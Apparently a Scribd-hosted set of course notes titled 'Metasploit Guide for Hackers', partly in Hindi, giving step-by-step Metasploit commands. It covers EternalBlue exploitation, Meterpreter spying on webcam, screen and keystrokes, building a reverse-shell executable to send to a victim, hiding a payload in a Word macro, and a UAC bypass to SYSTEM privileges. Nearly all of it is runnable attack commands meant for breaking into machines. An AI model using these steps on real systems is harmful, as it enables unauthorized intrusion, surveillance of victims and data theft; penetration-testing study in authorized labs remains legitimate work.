[go: up one dir, main page]
Scribd
Upload
87 views3 pages

Metasploit Guide for Hackers

The document discusses the Metasploit framework, an open-source penetration testing platform containing various exploits, payloads, and auxiliary modules. It describes the different modules like auxiliary, exploit, and payloads, providing examples of commands to use nmap for port scanning and the eternalblue exploit. The document also covers post-exploitation techniques using meterpreter as well as payload creation and bypassing user account controls.

Uploaded by

afdf
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
87 views3 pages

Metasploit Guide for Hackers

The document discusses the Metasploit framework, an open-source penetration testing platform containing various exploits, payloads, and auxiliary modules. It describes the different modules like auxiliary, exploit, and payloads, providing examples of commands to use nmap for port scanning and the eternalblue exploit. The document also covers post-exploitation techniques using meterpreter as well as payload creation and bypassing user account controls.

Uploaded by

afdf
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

Day 4

=====
Metasploit Framework
====================
It is an exploitation tool which is used for hacking into the systems. It is
the tool which is build by Rapid7.

Location for Metasploit Framework:


/usr/share/metasploit-framework/

We have 7 modules in Metasploit Framework:


1. Auxiliary
2. Exploit
3. Payload
4. NOPS
5. Encoders
6. Evasions
7. Post

Auxiliary
=========
Helping Module. They are used for gathering the information, scanning and for
confirming that your machine can be exploited or not.
/usr/share/metasploit-framework/modules/auxiliary

Exploit
=======
These are the codes, which are used for hacking into or breaching into the
system. Ye codes hote hai jis se aap ek system ke andr ghus sakte ho.
/usr/share/metasploit-framework/modules/exploits

Payloads
========
These are the stubs which we create to gain the access of the system.
/usr/share/metasploit-framework/modules/payloads

Some Basic Terminologies


------------------------
Vulnerabilities
Security misconfigurations and loopholes. Which can lead the attacker to
breach into the system.
Locked Door
Chimney
Glass Windows

Exploit
It is the code via which you exploit the system.
Breach was done via glass window

Payload
These are used for sending the data from target system to the attacker
system.
Aaditya Kaushik -> Jo saman utha ke shradddha[Target] ke ghar se
Abhishek [attacker] ke ghar tk leke jaa raha tha.

Backdoor
It is a secret passage via which an attacker can access the system anytime.

4 Other Terminologies
----------------------
1. RHOST -> Remote IP Adddress. Target ka IP Adddress
2. RPORT -> Remote Port. Target machine pr jis port pr service chal rahi hai.
[Default]
3. LHOST -> Listener IP Adddress. Attacker ka IP Adddress.
4. LPORT -> Listener Port. Attacker ka ek port jis pe aap connection receive kr rhe
ho

R -> Target Information. Jis machine ko aap hack krna chahte ho, us machine ke
information
L -> Attacker's Information. Yaha pr aapne apne system ke information input krni
hai

For starting metasploit-framework:


#msfconsole
#banner
#search portscan
For Auxiliary
-------------
#use auxiliary/scanner/portscan/syn
#options
#set rhosts 192.168.98.130
#options
#run
#back
#search eternalblue
#use auxiliary/scanner/smb/smb_ms17_010
#options
#set rhosts 192.168.98.130
#run
For Exploit
-----------
#search eternalblue
#use exploit/windows/smb/ms17_010_EternalBlue
#options
#set rhosts 192.168.98.130 -> Target IP Adddress
#options
#set LHOST 192.168.98.187 -> Attacker's IP Adddress
#options
#set LPORT 1337
#exploit
Post Exploitation
-----------------
meterpreter>webcam_stream
meterpreter>screenshot
meterpreter>keystroke_scan
meterpreter>keystroke_dump
For Creation of Payloads
------------------------
Open a new Terminal1
-------------------
#msfconsole
#show payloads
#search payload/windows
payload/windows/meterpreter/reverse_tcp

Open another Terminal2


----------------------
#msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.98.187 lport=1337
-f exe -o /root/Desktop/pikachu.exe

Now copy or send pikachu.exe file to the target and will wait for the target
to execute.

Goto Terminal1
--------------
#use exploit/multi/handler
#options
#set payload windows/meterpreter/reverse_tcp
#options
#set lhost 192.168.98.187
#set lport 1337
#options
#exploit

MACRO Exploit and Reverse HTTPS


=============
#msfvenom -p windows/meterpreter/reverse_https lhost=192.168.98.187
lport=1337 -f vba
copy the content of the code.
Open MS Word and type anything.
Click on "View" -> "Macros" -> "View Macros"
Give any name to the macro -> click on "create"
Delete whatever is there on the screen and paste the whole copied code and
save it and save the file.

#msfconsole
#use exploit/multi/handler
#set payload windows/meterpreter/reverse_https
#options
#set lhost 192.168.98.187
#set lport 1337
#options
#exploit

Bypass UAC -> User Account Control


----------------------------------
meterpreter>getsystem
meterpreter>background
#back
#search UAC
#use exploit/windows/local/bypassuac
#options
#sessions -l
#set session 3
#exploit
meterpreter>getuid
|-> User
meterpreter>getsystem
meterpreter>getuid
|-> NT SYSTEM AUTHORITIES

You might also like